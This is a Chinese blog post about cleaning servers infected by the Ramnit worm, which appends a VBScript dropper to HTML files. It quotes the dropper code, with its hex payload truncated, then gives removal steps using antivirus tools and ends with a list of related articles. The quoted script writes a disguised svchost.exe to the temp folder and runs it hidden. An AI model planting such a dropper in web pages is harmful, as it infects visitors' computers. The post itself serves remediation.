HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法

参考:

https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html

最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样

  1. <SCRIPT  Language=VBScript>
  2. DropFileName = “svchost.exe”
  3. WriteData =
  4. “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”
  5. Set FSO = CreateObject("Scripting.FileSystemObject")
  6. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  7. If FSO.FileExists(DropPath)=False Then
  8. Set FileObj = FSO.CreateTextFile(DropPath, True)
  9. For i = 1 To Len(WriteData) Step 2
  10. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  11. Next
  12. FileObj.Close
  13. End If
  14. Set WSHshell = CreateObject("WScript.Shell")
  15. WSHshell.Run DropPath, 0
  16. //--></SCRIPT>

到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的  Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案

1、下载    赛门铁克的  Ramnit 蠕虫病毒 专杀工具

下载地址:https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99

下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。

2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。

ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html

目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。



首先表示强烈谴责,没事写出这种木马来。导致开发者把时间花在解决这种问题上。

这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大。大概213kb。可以看出他就是在恶搞。

如图:

你写好的html,过段时间就变成这样了。前端开发表示简直心态爆炸。

解决方案:

1.至以下链接处下载ATTK扫描工具:

http://support.trendmicro.com.cn ... stomizedpackage.exe (32位)

http://support.trendmicro.com.cn ... mizedpackage_64.exe(64位)

2.将下载的工具(supportcustomizedpackage)放到有问题的电脑上,双击运行
3.在打开的界面中手动设定扫描全盘文件

运行:

全盘扫描:

转:https://bbs.kafan.cn/thread-1830286-1-1.html

原文地址:https://www.cnblogs.com/wangyuman26/p/10868966.html

时间: 2024-11-06 07:42:01

HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法的相关文章

win7的svchost.exe占用内存过高如何解决

有的时候我们会发现win7系统的svchost.exe占用大量的内存和CPU,导致电脑卡顿,就算是重新做系统也无法避免. 工具/原料 windows7 方法/步骤 1 在我的电脑上点击鼠标右键,选择[管理] 2 选择右侧[服务和应用程序]下的[服务]选项 3 找到名称我Superfetch的服务,双击鼠标左键. 4 选择启动类型为[手动]方式. 5 点击[确定]按钮,完成设置 6 重新启动电脑后,进入任务管理器查看svchost.exe进程的情况,此时可以看到占用的内存和CPU资源已经大幅度降低

病毒木马查杀第008篇:熊猫烧香之病毒查杀总结

一.前言 之前用了六篇文章的篇幅,分别从手动查杀.行为分析.专杀工具的编写以及逆向分析等方面,对"熊猫烧香"病毒的查杀方式做了讨论.相信大家已经从中获取了自己想要的知识,希望大家在阅读完这几篇文章后,能够有一种"病毒也不过如此"的感觉,更希望这些文章能够为有志于在未来参与到反病毒工作的朋友,打下坚实的理论基础.以下就是我在这几篇文章的分析中所总结出来的一些知识点,分为静态分析与动态分析两个方面进行讨论,并加入了一些延伸知识,为大家查漏补缺. 二.病毒的静态分析 静态

安卓病毒查杀 并追终病毒源头

安卓病毒从权限分有2种 一种会攻击系统root权限 也就是自己充当root工具获取系统root权限   这种病毒特点是难以卸载  恢复出厂无法清除.还有一种是不会进行获取root权限的病毒 ,恢复出厂可以清除. 从网络分为2种  一种互联网控制  还有一种 短信指令控制  很少存在单机病毒,因为黑客不喜欢玩单机. 对于任何病毒 你要把它当成软件看  因为任何病毒的本质属性就是软件 只是在软件上增加了隐蔽性 远程控制性 自启动性等特点 所以清楚病毒的本质是卸载软件.就算还有 病毒残渣,比如病毒产生

*管家病毒查杀原理逆向分析

本文研究的是*管家2.8—3.6版本的杀毒模块功能实现.众所周知,杀毒软件查杀病毒分为主动查杀和被动查杀两种方式.*管家的主动查杀包括快速查收和全盘查杀,而快速查杀和全盘查杀都使用了本地查杀技术和云查杀技术. 快速查杀 快速查杀首先获取系统安装的所有应用.创建"/data/data/com.anguanjia.safe/classes.dex"文件,将待扫描的apk解压,获取包中的classes.dex文件内容写入到"/data/data/com.anguanjia.safe

关于asp.net执行exe程序时权限不够的解决办法

一,本文背景 长话短说:asp.net项目中需要用到PDF转换成SWF文件,用户上传后自动调用pdf2swf.exe转换. 但有个问题,执行时权限不够,导致一直报错(滚动条一直在往下滚,刷屏中),见下图 二,解决办法 百度了一堆答案,很多说是要改IIS执行环境的,但我的情况不是这样,因为我是在VS中执行的,还没部署就已经出现错误了. 出去上了个厕所,回来无意中把进度的执行目录改成了pdf2swf.exe所在的目录,竟然一下子好了,(见下图) 其中 pdf2FlashPath 就是 pdf2swf

DropFileName = &quot;svchost.exe&quot; 问题解决方案

1.至以下链接处下载ATTK扫描工具: http://support.trendmicro.com.cn ... stomizedpackage.exe (32位) http://support.trendmicro.com.cn ... mizedpackage_64.exe(64位) 2.将下载的工具(supportcustomizedpackage)放到有问题的电脑上,双击运行 3.在打开的界面中手动设置全盘扫描模式

解决html文件的DropFileName = &quot;svchost.exe&quot;木马

首先表示强烈谴责,没事写出这种木马来.导致开发者把时间花在解决这种问题上. 这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大.大概213kb.可以看出他就是在恶搞. 如图: 你写好的html,过段时间就变成这样了.前端开发表示简直心态爆炸. 解决方案: 1.至以下链接处下载ATTK扫描工具: http://support.trendmicro.com.cn ... stomizedpackage.exe (32位) http://support.tr

关于WIN32.EXE变态木马下载器的解决办法

一.WIN32.EXE的来源:http://fdghewrtewrtyrew.biz/adv/130/win32.exe 二.运行后的表现:此WIN32.EXE通过80和8080端口访问若干个IP,若防火墙不能监测到或令防火墙允许该访问,WIN32.EXE会自动下载木马Kernels8.exe到system32目录下:Kernels8.exe自网络下载1.dlb.2.dlb.....等一堆木马到当前用户文件夹中,并自动运行.下载的木马加载运行后,又从网络上下载其它木马/蠕虫. 木马/蠕虫完全下载

最新NSA勒索病毒查杀办法

文章转载于:http://www.zoneidc.com/ 5月12日晚上8点多开始,全球爆发大面积"比特币勒索"网络病毒攻击,我国暂发现多家大学的教育系统.学生个人计算机被攻击.本次爆发的勒索软件是一个名称为"wannacry"的新家族,目前无法解密该勒索软件加密的文件.该勒索软件迅速感染全球大量主机的原因是利用了基于445端口传播扩散的SMB漏洞MS17-101(永恒之蓝),微软在今年3月份发布了该漏洞的补丁. 针对比特币勒索病毒"(WannaCry)